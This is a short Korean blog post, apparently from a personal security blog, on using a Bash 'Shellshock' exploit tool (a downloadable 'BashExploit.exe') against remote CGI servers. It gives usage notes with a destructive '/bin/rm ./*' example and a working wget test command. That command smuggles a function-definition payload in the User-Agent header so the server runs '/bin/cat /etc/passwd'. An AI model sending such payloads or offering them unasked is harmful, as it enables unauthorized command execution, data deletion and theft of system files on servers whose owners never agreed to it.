Bash shell Exploit




Intro


For more information, see http://www.exploit-db.com/exploits/34765/



Download


BashExploit.exe



Program

Command 에서 사용할 명령은 반드시 Full 경로로 입력할 것.

rm ./*

로 하면 안되고

/bin/rm ./*

처럼 정확히 명시해야 함.


명령이 정상적으로 서버의 bash 에 의해 수행되었는지는, 직접 확인해야 함.

 - 원격으로는 확인할 방법이 없음.



TEST CODE;

wget -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" http://10.248.2.15/cgi-bin/testing.cgi


'Security' 카테고리의 다른 글

Attacking with HTML5  (0) 2011.05.08
DLNA 의 보안 문제점  (0) 2011.05.02